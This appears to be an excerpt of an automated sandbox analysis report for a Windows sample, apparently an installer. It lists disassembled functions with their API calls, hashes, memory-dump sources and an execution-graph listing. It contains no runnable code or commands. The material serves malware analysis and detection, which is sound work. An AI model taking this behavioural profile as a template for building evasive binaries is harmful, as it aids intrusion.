                                                                                                                                                                                    • Opcode Fuzzy Hash: 6502492516440c40321f6c440113f9ce282d7bb2c3c872fdf5e33247a2bec000
                                                                                                                                                                                    • Instruction Fuzzy Hash: A721DB71A04225ABCF207FA48E49B6E7670AB14358F20413BFB11B62D0CBBD4942966E
                                                                                                                                                                                    Function 367B7153 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 367B715C
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 367B717F
                                                                                                                                                                                      • Part of subcall function 367B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 367B5702
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 367B71A5
                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 367B71C7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1794362364-0
                                                                                                                                                                                    • Opcode ID: 1f857ddc2822e2c76489f30c85ae04609d3bd6db269cb549c3b468cd18312b5e
                                                                                                                                                                                    • Instruction ID: 2913ae7c7977a55ee1f19fa654b39bc02948104f836738002e5f26736954fd8d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f857ddc2822e2c76489f30c85ae04609d3bd6db269cb549c3b468cd18312b5e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F01ACB6A112197F3B110AB74C9CDBB6A6FDEC69A43D44129FE04DF340EE608C02C2B1
                                                                                                                                                                                    Function 00402BB4 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C22
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C43
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close$Enum
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 464197530-0
                                                                                                                                                                                    • Opcode ID: 24478c4bf15825225cc5c8a9b60ec975c192d416f9cfe0da761514a225b2f336
                                                                                                                                                                                    • Instruction ID: b62f4967d327be975f6bbb281b4945b449d6b6e398a7fc8ef6fb9c274ae0afe8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 24478c4bf15825225cc5c8a9b60ec975c192d416f9cfe0da761514a225b2f336
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A118832500109BBEF01AF91CF09B9E3B79EF08341F104036BA05B50E0E7B4EE52AB68
                                                                                                                                                                                    Function 367B5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,367B1D66,00000000,00000000,?,367B5C88,367B1D66,00000000,00000000,00000000,?,367B5E85,00000006,FlsSetValue), ref: 367B5D13
                                                                                                                                                                                    • GetLastError.KERNEL32(?,367B5C88,367B1D66,00000000,00000000,00000000,?,367B5E85,00000006,FlsSetValue,367BE190,FlsSetValue,00000000,00000364,?,367B5BC8), ref: 367B5D1F
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,367B5C88,367B1D66,00000000,00000000,00000000,?,367B5E85,00000006,FlsSetValue,367BE190,FlsSetValue,00000000), ref: 367B5D2D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                    • Opcode ID: 5c178053a13e77a6ff52db051dcc20086a06b4be2518da0ebeb24c4c28fb029e
                                                                                                                                                                                    • Instruction ID: 55116ce76b6a2a6d57e3d79add1264c5712b0c0e7a7d5031effccddcc7d133f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c178053a13e77a6ff52db051dcc20086a06b4be2518da0ebeb24c4c28fb029e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 720188366253326BFB114E69ACC8E56775AAF057E1BF00720FA05EB140D730D802CAE0
                                                                                                                                                                                    Function 00405552 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,?,00436400), ref: 00405595
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004055A9
                                                                                                                                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055BE
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004055C8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3449924974-0
                                                                                                                                                                                    • Opcode ID: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                                                                                                                                                                                    • Instruction ID: d93b5df8f7ffc7c008eac1e7bdc238e6dcac3e6f5ce479452586b7e310885e58
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                                                                                                                                                                                    • Instruction Fuzzy Hash: 550108B1C00219EADF11DBA1CD047EFBFB9EF04354F00803AD545B6290D77896088FA9
                                                                                                                                                                                    Function 00402CE4 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32(?,00000000,00402EC4,00000001), ref: 00402CF7
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402D15
                                                                                                                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D32
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402D40
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                    • Opcode ID: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
                                                                                                                                                                                    • Instruction ID: 5343e4f3fd542578671bd54a8d6f819db7b5394acccd132b40ed42660498aa91
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F05430601521EBC7207F24FE8CA8F7A64BB08B11791047AF445B21F4DBB448C28B9C
                                                                                                                                                                                    Function 00405000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040502F
                                                                                                                                                                                    • CallWindowProcA.USER32(?,?,?,?), ref: 00405080
                                                                                                                                                                                      • Part of subcall function 00404072: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00404084
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                    • Opcode ID: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
                                                                                                                                                                                    • Instruction ID: 2f0027df7ddfe28b71d6e39f600ecebaf2ba5c74aec8f2e947ae9809186c917a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48017171500609ABDF205F51DD80E6F3B65EB84754F14403BFA01751D2C77A8CA29F9A
                                                                                                                                                                                    Function 00405B2D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405B41
                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B5B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                    • String ID: nsa
                                                                                                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                                                                                                    • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                                                                                                                                    • Instruction ID: 439a7608ba980c1fff97265348ba0c774925dff8d33d3cb941cf273fff524f8a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                                                                                                                                    • Instruction Fuzzy Hash: B0F082363042086BDB108F66DD04B9B7BA9DF91750F14803BFA48AA280D6B4E9588799
                                                                                                                                                                                    Function 367B69F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetOEMCP.KERNEL32(00000000,?,?,367B6C7C,?), ref: 367B6A1E
                                                                                                                                                                                    • GetACP.KERNEL32(00000000,?,?,367B6C7C,?), ref: 367B6A35
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: |l{6
                                                                                                                                                                                    • API String ID: 0-1108461528
                                                                                                                                                                                    • Opcode ID: 8b334d83cdbd10e18e422f964297ba443ea338c5bb72a0e9bb28f6cb8ec0ae4f
                                                                                                                                                                                    • Instruction ID: 0f6172eaeca90a009099a131d95631235f90a1eba5571034e53eb37495a7e700
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b334d83cdbd10e18e422f964297ba443ea338c5bb72a0e9bb28f6cb8ec0ae4f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF037348102198FEF20DB68C498BAC7772BF0133AFA48758E6289B1D5DB759956CF81
                                                                                                                                                                                    Function 00405604 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 0040562D
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040563A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Error launching installer, xrefs: 00405617
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                    • String ID: Error launching installer
                                                                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                                                                    • Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                                                                                                                                                                                    • Instruction ID: a14d50d96640d218925096829ca07d1800dc2b789f456133151d87fd2ad2a836
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EE046F0640209BFEB109FA0ED49F7F7AACEB00704F404921BD00F2290E67499088A7C
                                                                                                                                                                                    Function 00405A63 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
                                                                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A8B
                                                                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A9C
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                    • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                                                                                                                                                    • Instruction ID: de8867e187cffd76a1833f018909c3af52f45fcf8c0597c8515af2ce59788131
                                                                                                                                                                                    • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F0C231201818AFCB02DBA4CD80D9EBBA8EF46350B2540B9E840F7211D774DE019FA9

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:6.7%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                    Signature Coverage:3.2%
                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                    Total number of Limit Nodes:80
                                                                                                                                                                                    execution_graph 37632 44dea5 37633 44deb5 FreeLibrary 37632->37633 37634 44dec3 37632->37634 37633->37634 37635 4287c1 37636 4287d2 37635->37636 37639 429ac1 37635->37639 37640 428818 37636->37640 37641 42881f 37636->37641 37651 425711 37636->37651 37637 4259da 37698 416760 11 API calls 37637->37698 37650 425ad6 37639->37650 37705 415c56 11 API calls 37639->37705 37672 42013a 37640->37672 37700 420244 97 API calls 37641->37700 37643 4260dd 37699 424251 120 API calls 37643->37699 37646 4259c2 37646->37650 37692 415c56 11 API calls 37646->37692 37651->37637 37651->37639 37651->37646 37654 422aeb memset memcpy memcpy 37651->37654 37655 429a4d 37651->37655 37661 4260a1 37651->37661 37671 425a38 37651->37671 37688 4227f0 memset memcpy 37651->37688 37689 422b84 15 API calls 37651->37689 37690 422b5d memset memcpy memcpy 37651->37690 37691 422640 13 API calls 37651->37691 37693 4241fc 11 API calls 37651->37693 37694 42413a 90 API calls 37651->37694 37654->37651 37656 429a66 37655->37656 37657 429a9b 37655->37657 37701 415c56 11 API calls 37656->37701 37660 429a96 37657->37660 37703 416760 11 API calls 37657->37703 37704 424251 120 API calls 37660->37704 37697 415c56 11 API calls 37661->37697 37663 429a7a 37702 416760 11 API calls 37663->37702 37671->37646 37695 422640 13 API calls 37671->37695 37696 4226e0 12 API calls 37671->37696 37673 42014c 37672->37673 37676 420151 37672->37676 37715 41e466 97 API calls 37673->37715 37675 420162 37675->37651 37676->37675 37677 4201b3 37676->37677 37678 420229 37676->37678 37679 4201b8 37677->37679 37680 4201dc 37677->37680 37678->37675 37681 41fd5e 86 API calls 37678->37681 37706 41fbdb 37679->37706 37680->37675 37684 4201ff 37680->37684 37712 41fc4c 37680->37712 37681->37675 37684->37675 37687 42013a 97 API calls 37684->37687 37687->37675 37688->37651 37689->37651 37690->37651 37691->37651 37692->37637 37693->37651 37694->37651 37695->37671 37696->37671 37697->37637 37698->37643 37699->37650 37700->37651 37701->37663 37702->37660 37703->37660 37704->37639 37705->37637 37707 41fbf1 37706->37707 37708 41fbf8 37706->37708 37711 41fc39 37707->37711 37730 4446ce 11 API calls 37707->37730 37720 41ee26 37708->37720 37711->37675 37716 41fd5e 37711->37716 37713 41ee6b 86 API calls 37712->37713 37714 41fc5d 37713->37714 37714->37680 37715->37676 37719 41fd65 37716->37719 37717 41fdab 37717->37675 37718 41fbdb 86 API calls 37718->37719 37719->37717 37719->37718 37721 41ee41 37720->37721 37722 41ee32 37720->37722 37731 41edad 37721->37731 37734 4446ce 11 API calls 37722->37734 37726 41ee3c 37726->37707 37728 41ee58 37728->37726 37736 41ee6b 37728->37736 37730->37711 37740 41be52 37731->37740 37734->37726 37735 41eb85 11 API calls 37735->37728 37737 41ee70 37736->37737 37738 41ee78 37736->37738 37793 41bf99 86 API calls 37737->37793 37738->37726 37741 41be6f 37740->37741 37742 41be5f 37740->37742 37747 41be8c 37741->37747 37772 418c63 memset memset 37741->37772 37771 4446ce 11 API calls 37742->37771 37744 41be69 37744->37726 37744->37735 37747->37744 37748 41bf3a 37747->37748 37750 41bed1 37747->37750 37752 41bee7 37747->37752 37775 4446ce 11 API calls 37748->37775 37751 41bef0 37750->37751 37754 41bee2 37750->37754 37751->37752 37753 41bf01 37751->37753 37752->37744 37776 41a453 86 API calls 37752->37776 37755 41bf24 memset 37753->37755 37757 41bf14 37753->37757 37773 418a6d memset memcpy memset 37753->37773 37761 41ac13 37754->37761 37755->37744 37774 41a223 memset memcpy memset 37757->37774 37760 41bf20 37760->37755 37762 41ac3f memset 37761->37762 37763 41ac52 37761->37763 37768 41acd9 37762->37768 37765 41ac6a 37763->37765 37777 41dc14 19 API calls 37763->37777 37766 41aca1 37765->37766 37778 41519d 37765->37778 37766->37768 37769 41acc0 memset 37766->37769 37770 41accd memcpy 37766->37770 37768->37752 37769->37768 37770->37768 37771->37744 37772->37747 37773->37757 37774->37760 37775->37752 37777->37765 37781 4175ed 37778->37781 37789 417570 SetFilePointer 37781->37789 37784 41760a ReadFile 37785 417637 37784->37785 37786 417627 GetLastError 37784->37786 37787 4151b3 37785->37787 37788 41763e memset 37785->37788 37786->37787 37787->37766 37788->37787 37790 4175b2 37789->37790 37791 41759c GetLastError 37789->37791 37790->37784 37790->37787 37791->37790 37792 4175a8 GetLastError 37791->37792 37792->37790 37793->37738 37794 417bc5 37795 417c61 37794->37795 37796 417bda 37794->37796 37796->37795 37797 417bf6 UnmapViewOfFile CloseHandle 37796->37797 37799 417c2c 37796->37799 37801 4175b7 37796->37801 37797->37796 37797->37797 37799->37796 37806 41851e 20 API calls 37799->37806 37802 4175d6 CloseHandle 37801->37802 37803 4175c8 37802->37803 37804 4175df 37802->37804 37803->37804 37805 4175ce Sleep 37803->37805 37804->37796 37805->37802 37806->37799 37807 4152c7 malloc 37808 4152ef 37807->37808 37810 4152e2 37807->37810 37811 416760 11 API calls 37808->37811 37811->37810 37812 4232e8 37813 4232ef 37812->37813 37816 415b2c 37813->37816 37815 423305 37817 415b42 37816->37817 37820 415b46 37816->37820 37818 415b94 37817->37818 37817->37820 37821 415b5a 37817->37821 37823 4438b5 37818->37823 37820->37815 37821->37820 37822 415b79 memcpy 37821->37822 37822->37820 37824 4438d0 37823->37824 37834 4438c9 37823->37834 37837 415378 memcpy memcpy 37824->37837 37834->37820 37838 41276d 37839 41277d 37838->37839 37881 4044a4 LoadLibraryW 37839->37881 37841 412785 37842 412789 37841->37842 37889 414b81 37841->37889 37845 4127c8 37895 412465 memset ??2@YAPAXI 37845->37895 37847 4127ea 37907 40ac21 37847->37907 37852 412813 37925 40dd07 memset 37852->37925 37853 412827 37930 40db69 memset 37853->37930 37856 412822 37951 4125b6 ??3@YAXPAX 37856->37951 37858 40ada2 _wcsicmp 37860 41283d 37858->37860 37860->37856 37863 412863 CoInitialize 37860->37863 37935 41268e 37860->37935 37955 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37863->37955 37866 41296f 37957 40b633 37866->37957 37868 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37873 412957 CoUninitialize 37868->37873 37878 4128ca 37868->37878 37873->37856 37874 4128d0 TranslateAcceleratorW 37875 412941 GetMessageW 37874->37875 37874->37878 37875->37873 37875->37874 37876 412909 IsDialogMessageW 37876->37875 37876->37878 37877 4128fd IsDialogMessageW 37877->37875 37877->37876 37878->37874 37878->37876 37878->37877 37879 41292b TranslateMessage DispatchMessageW 37878->37879 37880 41291f IsDialogMessageW 37878->37880 37879->37875 37880->37875 37880->37879 37882 4044f7 37881->37882 37883 4044cf GetProcAddress 37881->37883 37887 404507 MessageBoxW 37882->37887 37888 40451e 37882->37888 37884 4044e8 FreeLibrary 37883->37884 37885 4044df 37883->37885 37884->37882 37886 4044f3 37884->37886 37885->37884 37886->37882 37887->37841 37888->37841 37890 414b8a 37889->37890 37891 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37889->37891 37961 40a804 memset 37890->37961 37891->37845 37894 414b9e GetProcAddress 37894->37891 37896 4124e0 37895->37896 37897 412505 ??2@YAPAXI 37896->37897 37898 412521 37897->37898 37899 41251c 37897->37899 37972 444722 37898->37972 37983 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37899->37983 37906 41259b wcscpy 37906->37847 37988 40b1ab free free 37907->37988 37909 40ad76 37989 40aa04 37909->37989 37912 40a9ce malloc memcpy free free 37915 40ac5c 37912->37915 37913 40ad4b 37913->37909 38012 40a9ce 37913->38012 37915->37909 37915->37912 37915->37913 37916 40ace7 free 37915->37916 37992 40a8d0 37915->37992 38004 4099f4 37915->38004 37916->37915 37920 40a8d0 7 API calls 37920->37909 37921 40ada2 37922 40adc9 37921->37922 37923 40adaa 37921->37923 37922->37852 37922->37853 37923->37922 37924 40adb3 _wcsicmp 37923->37924 37924->37922 37924->37923 38017 40dce0 37925->38017 37927 40dd3a GetModuleHandleW 38022 40dba7 37927->38022 37931 40dce0 3 API calls 37930->37931 37932 40db99 37931->37932 38094 40dae1 37932->38094 38108 402f3a 37935->38108 37937 412766 37937->37856 37937->37863 37938 4126d3 _wcsicmp 37939 4126a8 37938->37939 37939->37937 37939->37938 37941 41270a 37939->37941 38143 4125f8 7 API calls 37939->38143 37941->37937 38111 411ac5 37941->38111 37952 4125da 37951->37952 37953 4125f0 37952->37953 37954 4125e6 DeleteObject 37952->37954 37956 40b1ab free free 37953->37956 37954->37953 37955->37868 37956->37866 37958 40b640 37957->37958 37959 40b639 free 37957->37959 37960 40b1ab free free 37958->37960 37959->37958 37960->37842 37962 40a83b GetSystemDirectoryW 37961->37962 37963 40a84c wcscpy 37961->37963 37962->37963 37968 409719 wcslen 37963->37968 37966 40a881 LoadLibraryW 37967 40a886 37966->37967 37967->37891 37967->37894 37969 409724 37968->37969 37970 409739 wcscat LoadLibraryW 37968->37970 37969->37970 37971 40972c wcscat 37969->37971 37970->37966 37970->37967 37971->37970 37973 444732 37972->37973 37974 444728 DeleteObject 37972->37974 37984 409cc3 37973->37984 37974->37973 37976 412551 37977 4010f9 37976->37977 37978 401130 37977->37978 37979 401134 GetModuleHandleW LoadIconW 37978->37979 37980 401107 wcsncat 37978->37980 37981 40a7be 37979->37981 37980->37978 37982 40a7d2 37981->37982 37982->37906 37982->37982 37983->37898 37987 409bfd memset wcscpy 37984->37987 37986 409cdb CreateFontIndirectW 37986->37976 37987->37986 37988->37915 37990 40aa14 37989->37990 37991 40aa0a free 37989->37991 37990->37921 37991->37990 37993 40a8eb 37992->37993 37994 40a8df wcslen 37992->37994 37995 40a906 free 37993->37995 37996 40a90f 37993->37996 37994->37993 37997 40a919 37995->37997 37998 4099f4 3 API calls 37996->37998 37999 40a932 37997->37999 38000 40a929 free 37997->38000 37998->37997 38002 4099f4 3 API calls 37999->38002 38001 40a93e memcpy 38000->38001 38001->37915 38003 40a93d 38002->38003 38003->38001 38005 409a41 38004->38005 38006 4099fb malloc 38004->38006 